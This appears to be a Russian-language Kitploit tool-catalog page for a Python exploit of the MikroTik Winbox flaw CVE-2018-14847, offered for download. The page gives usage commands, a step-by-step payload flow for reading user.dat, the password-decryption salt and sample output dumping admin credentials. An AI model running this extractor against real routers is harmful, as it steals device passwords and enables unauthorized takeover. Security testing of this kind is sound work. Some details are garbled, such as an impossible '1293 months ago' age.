Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
VULNERAVEL-CVE-2018-14847---CREDENCIAIS-EXTRAIDAS — VULNERAVEL CVE-2018-14847 - ИЗВЛЕЧЕННЫЕ УЧЕТНЫЕ ДАННЫЕ MIKROTIK НА PYTHON | Kitploit
Инструменты/GitHubGitHub/mourafuseti/vulneravel-cve-2018-14847---credenciais-extraidas
Безопасность IoTАтаки на ПаролиАнализ уязвимостейЭксплуатацияСетевая безопасностьRed Teaming
GitHubmourafuseti/vulneravel-cve-2018-14847---credenciais-extraidas

VULNERAVEL-CVE-2018-14847---CREDENCIAIS-EXTRAIDAS

VULNERAVEL CVE-2018-14847 - ИЗВЛЕЧЕННЫЕ УЧЕТНЫЕ ДАННЫЕ MIKROTIK НА PYTHON

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
1293 месяцев назадЕщё не проверено

Инструменты для Pentest — /rede

Репозиторий скриптов для аудита и тестирования проникновения в сети. Используйте только на устройствах с письменного разрешения.


CVE-2018-14847 — Экстрактор учётных данных MikroTik Winbox

Описание

Эксплуатирует уязвимость неаутентифицированного чтения файлов в сервисе Winbox MikroTik RouterOS. Обработчик файлов (handler ID 2) не проверяет аутентификацию, что позволяет внешнему атакующему прочитать файл user.dat, содержащий всех пользователей и пароли устройства.

Пароли хранятся в зашифрованном виде с помощью XOR с ключом MD5(пользователь + "283i4jfkai3389"). Скрипт автоматически выполняет расшифровку.

Затронутые версии

BranchУязвимые доИсправленная версия
Stable6.426.42.1
Long-term6.40.76.40.8
RC6.426.43

Требования

  • Python 3.x (без внешних зависимостей)
  • Доступный порт 8291 (Winbox) на цели

Использование

root@kitploit:~
python3 cve_2018_14847.py <IP>
python3 cve_2018_14847.py <IP> --port 8291

Примеры

root@kitploit:~
# Цель по умолчанию на порту 8291
python3 cve_2018_14847.py 192.168.1.1

# Нестандартный порт
python3 cve_2018_14847.py 192.168.1.1 --port 8291

Поток эксплойта

root@kitploit:~
1. Подключается к порту 8291 (Winbox)
        ↓
2. Отправляет FIRST_PAYLOAD — открывает сессию + запрашивает /flash/rw/store/user.dat
        ↓
3. Извлекает Session ID из байта 38 ответа
        ↓
4. Вставляет Session ID в байт 19 SECOND_PAYLOAD
        ↓
5. Отправляет SECOND_PAYLOAD — читает файл user.dat
        ↓
6. Разбирает записи M2 → извлекает пользователя и зашифрованный пароль
        ↓
7. Расшифровывает пароль: XOR с MD5(пользователь + соль)
        ↓
8. Выводит учётные данные и сохраняет в файл

Ожидаемый вывод

root@kitploit:~
═══════════════════════════════════════════════════════
  CVE-2018-14847  —  MikroTik Winbox Credential Dump
  Unauthenticated File Read + Password Decryption
  Затронуто: RouterOS 6.29 – 6.42 (< 6.40.8 / 6.42.1)
═══════════════════════════════════════════════════════
  Цель  : 192.168.1.1:8291
  Дата  : 2026-05-20 18:06:58

[*] Подключение к 192.168.1.1:8291 ...
[+] Подключено к сервису Winbox.
[*] Отправка payload 1 (запрос файла) ...
[+] Получен ответ (84 байта). Session ID: 0x35
[*] Отправка payload 2 (чтение user.dat) ...
[+] Получены данные (312 байт).
[*] Анализ user.dat (257 полезных байт) ...

═══════════════════════════════════════════════════════
  ИЗВЛЕЧЁННЫЕ УЧЁТНЫЕ ДАННЫЕ
═══════════════════════════════════════════════════════
  Пользователь : admin
  Пароль       : senha123
  Комбинация   : admin:senha123
───────────────────────────────────────────────────────
[+] Найдено 1 учётная(ых) запись(ей).
[+] Результат сохранён в: mikrotik_1192.168.1.1_20260520_180658.txt

Выходной файл

Результат автоматически сохраняется в:

root@kitploit:~
mikrotik_<IP>_<TIMESTAMP>.txt

Пример: mikrotik_192.168.1.1_20260520_180658.txt

Содержит: IP цели, дату, CVE, затронутую версию и все пары пользователь:пароль.

Ссылки

  • CVE: CVE-2018-14847
  • Exploit-DB: EDB-ID #45170
  • Первоначальное обнаружение: Omid Shojaei (@Dmitriy_area51)
  • Публикация: Апрель 2018

Структура папки

root@kitploit:~
/rede/
├── README.md                        # этот файл
├── cve_2018_14847.py                # MikroTik Winbox Credential Extractor
├── pentest_cgnat_100.64.0.0.md      # отчёт о пентесте CGNAT
├── pentest_roteador_192.168.2.1.md  # отчёт о пентесте роутера
└── mikrotik_<IP>_<TIMESTAMP>.txt    # результаты, сгенерированные скриптом

ПРАВОВОЕ ПРЕДУПРЕЖДЕНИЕ: Эти инструменты предназначены исключительно для использования в авторизованных средах. Несанкционированное выполнение против систем третьих лиц является преступлением, предусмотренным Законом 12.737/2012 (Закон Кэролайн Дикманн) и ст. 154-A Уголовного кодекса Бразилии.

Скачать инструмент